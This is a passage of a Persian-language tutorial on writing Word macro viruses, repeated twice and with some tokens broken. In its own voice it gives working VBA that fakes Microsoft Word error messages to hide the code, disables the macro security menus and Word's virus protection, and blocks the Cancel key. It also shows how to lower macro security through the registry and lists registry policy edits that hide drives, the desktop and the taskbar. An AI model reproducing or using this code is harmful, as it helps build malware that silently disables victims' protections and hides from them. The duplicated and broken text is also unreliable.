.پیام های خطا:
یک روش خوب برای جلوگیری از شناخته شدن جلوگیری است و آن هم استفاده از پیام های خطا می باشد. از این دست می توان به مثا ل زیر اشاره کرد:
Sub ViewCode()
MsgBox "Not enough memory", 16
End Sub
تنها کاری که باید انجام دهیم فقط و فقط افزایش یک مسج باکس بوده و معین کردن نوع پیام مورد نظر ما در پنجره . یک مثال:
MsgBox "This program has performed an illegal operation and will be shut
down.", vbCritical, "Microsoft Word"
به عنوان مثال برای پیام خطا های اطلاعاتی به شکل MsgBox "Not Enough Memory",
vbInformation
و برای خطاهای ضروری به شکل : MsgBox "Not Enough Memory",
vbExclamation
باشد.
در قسمت ذیل نیز یک سری از موارد مورد استفاده را مشاهده می نمایید:
Criticals:
16 - Critical
18 - Abort/Ignore/Retry
19 - Yes/No/Cancel
20 - Yes/No
21 - Retry/Cancel
Standard
1 - Ok/Cancel
2 - Abort/Ignore/Retry
3 - Yes/No/Cancel
4 - Yes/No
5 - Retry/Cancel
3. از کار انداختن Tool bar ها:
در ورد یک سری تول بار ها موجود بوده که به شما اجازه داده وضعیت ماکرو فایل ها را در تمامی مراحل کنترل و مشاهده کنید و باید آنها غیر فعال گردد. ما می خواهیم تغیرات امنیتی در ماکرو آلوده خود را به شکل زیر انجام دهیم:
CommandBars("Macro").Controls("Security...").Enabl ed = 0
خط بعد دکمه ماکرو را غیر فعال می سازد
CommandBars("Macro").Controls("Macros...").Enabled = 0
توجه نموده که می توانید به جای 0 از False و به جای Enable نیز از Delete استفاده کنید.
CommandBars("Tools").Controls("Customize...").Enab led = False
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("View").Controls("Status Bar").Enabled = False
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = False
CommandBars("Format").Controls("Style...").Enabled = Fals
در دستورات بالا ما یک بار status را که بر فعالیت ها نظارت میکرد را پاک نمودیم و احتما ل یافتن ماکرو خود را کاهش دادیم.
نکته دیگر اینست که شما می خواهید که در ویروس شما اصل ذخیره وجود داشته باشد یعنی کار بر را در هر شرایطی وادار به ذخیره نموده و در واقع به کاربر میگوید که فایل ذخیره شده است و دیگر به اجازه شما برای ذخیره احتیاجی نمی باشد.
NormalTemplate.Saved = True
ActiveDocument.Saved = True
دستور زیر نیز در راستای اجرای اتوماتیک وار ماکرو می باشد:
Options.VirusProtection = False
و دستور زیر نیز دکمه cancel را غیر فعال میکند حال مفید بودن این مورد را خودتان تصور کنید.
Application.EnableCancelKey = wdCancelDisabled
Application.ScreenUpdating = False 'this one is rather straightforward.
4. غیر فعال کردن ریجستری:
در این روش ما بوسیله ی دست بردن در ریجستری به هدف خود می رسیم. با دستور
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\W ord\Security", "Level") =
1&
سطحی امنیتی ماکرو را به پایین ترین حد کاهش میدهد.
در بخش پایین یک سری از این دستور ها را مورد بررسی قرار میدهیم:
کد های ریجستری زیر درایو ها را از Mycomputer حذف می نماید.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
Nodrives = 3
Disables Adding Printers:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
NoAddPrinter = 1
Sub folders at start-programs will be disabled.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
NoStartMenuSubFolders = 1
تمام موارد موجود بر روی دسکتاپ را مخفی می سازد:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
NoDesktop = 1
Message box will appear on start
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Winlogon
LegalNoticeCaption = Text
LegalNoticeText = Text
از میان بردن دکمه استارت
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
"NoCloseKey" = "1"
تنظیم دایرکتوری ویندوز
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Setup\SourcePath
"WinDir"="C:\Windows\"
نمایش صفحه ارتباطات با شبکه
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices]
"LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
"TrueVector"="C:\WINDOWS\SYSTEM\ZONELABS\VSMON .EXE -service"
"MiniLog"="C:\\WINDOWS\SYSTEM\ZONELABS\MINILOG .EXE -service"
این مورد پوشه Recent Documents را غیر فعال نموده که من پیشنهاد می کنم حتما از آن استفاده کنید.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
"NoRecentDocsMenu"="1"
Gets rid of the task bar:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
"NoTaskbar"=dword:00000000
).Name="Virus name" Then
Goto Destination
Next i
یک روش خوب برای جلوگیری از شناخته شدن جلوگیری است و آن هم استفاده از پیام های خطا می باشد. از این دست می توان به مثا ل زیر اشاره کرد:
Sub ViewCode()
MsgBox "Not enough memory", 16
End Sub
تنها کاری که باید انجام دهیم فقط و فقط افزایش یک مسج باکس بوده و معین کردن نوع پیام مورد نظر ما در پنجره . یک مثال:
MsgBox "This program has performed an illegal operation and will be shut
down.", vbCritical, "Microsoft Word"
به عنوان مثال برای پیام خطا های اطلاعاتی به شکل MsgBox "Not Enough Memory",
vbInformation
و برای خطاهای ضروری به شکل : MsgBox "Not Enough Memory",
vbExclamation
باشد.
در قسمت ذیل نیز یک سری از موارد مورد استفاده را مشاهده می نمایید:
Criticals:
16 - Critical
18 - Abort/Ignore/Retry
19 - Yes/No/Cancel
20 - Yes/No
21 - Retry/Cancel
Standard
1 - Ok/Cancel
2 - Abort/Ignore/Retry
3 - Yes/No/Cancel
4 - Yes/No
5 - Retry/Cancel
3. از کار انداختن Tool bar ها:
در ورد یک سری تول بار ها موجود بوده که به شما اجازه داده وضعیت ماکرو فایل ها را در تمامی مراحل کنترل و مشاهده کنید و باید آنها غیر فعال گردد. ما می خواهیم تغیرات امنیتی در ماکرو آلوده خود را به شکل زیر انجام دهیم:
CommandBars("Macro").Controls("Security...").Enabl ed = 0
خط بعد دکمه ماکرو را غیر فعال می سازد
CommandBars("Macro").Controls("Macros...").Enabled = 0
توجه نموده که می توانید به جای 0 از False و به جای Enable نیز از Delete استفاده کنید.
CommandBars("Tools").Controls("Customize...").Enab led = False
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("View").Controls("Status Bar").Enabled = False
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = False
CommandBars("Format").Controls("Style...").Enabled = Fals
در دستورات بالا ما یک بار status را که بر فعالیت ها نظارت میکرد را پاک نمودیم و احتما ل یافتن ماکرو خود را کاهش دادیم.
نکته دیگر اینست که شما می خواهید که در ویروس شما اصل ذخیره وجود داشته باشد یعنی کار بر را در هر شرایطی وادار به ذخیره نموده و در واقع به کاربر میگوید که فایل ذخیره شده است و دیگر به اجازه شما برای ذخیره احتیاجی نمی باشد.
NormalTemplate.Saved = True
ActiveDocument.Saved = True
دستور زیر نیز در راستای اجرای اتوماتیک وار ماکرو می باشد:
Options.VirusProtection = False
و دستور زیر نیز دکمه cancel را غیر فعال میکند حال مفید بودن این مورد را خودتان تصور کنید.
Application.EnableCancelKey = wdCancelDisabled
Application.ScreenUpdating = False 'this one is rather straightforward.
4. غیر فعال کردن ریجستری:
در این روش ما بوسیله ی دست بردن در ریجستری به هدف خود می رسیم. با دستور
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\W ord\Security", "Level") =
1&
سطحی امنیتی ماکرو را به پایین ترین حد کاهش میدهد.
در بخش پایین یک سری از این دستور ها را مورد بررسی قرار میدهیم:
کد های ریجستری زیر درایو ها را از Mycomputer حذف می نماید.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
Nodrives = 3
Disables Adding Printers:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
NoAddPrinter = 1
Sub folders at start-programs will be disabled.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
NoStartMenuSubFolders = 1
تمام موارد موجود بر روی دسکتاپ را مخفی می سازد:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
NoDesktop = 1
Message box will appear on start
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Winlogon
LegalNoticeCaption = Text
LegalNoticeText = Text
از میان بردن دکمه استارت
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
"NoCloseKey" = "1"
تنظیم دایرکتوری ویندوز
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Setup\SourcePath
"WinDir"="C:\Windows\"
نمایش صفحه ارتباطات با شبکه
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices]
"LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
"TrueVector"="C:\WINDOWS\SYSTEM\ZONELABS\VSMON .EXE -service"
"MiniLog"="C:\\WINDOWS\SYSTEM\ZONELABS\MINILOG .EXE -service"
این مورد پوشه Recent Documents را غیر فعال نموده که من پیشنهاد می کنم حتما از آن استفاده کنید.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
"NoRecentDocsMenu"="1"
Gets rid of the task bar:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
"NoTaskbar"=dword:00000000
).Name="Virus name" Then
Goto Destination
Next i
پیوند ها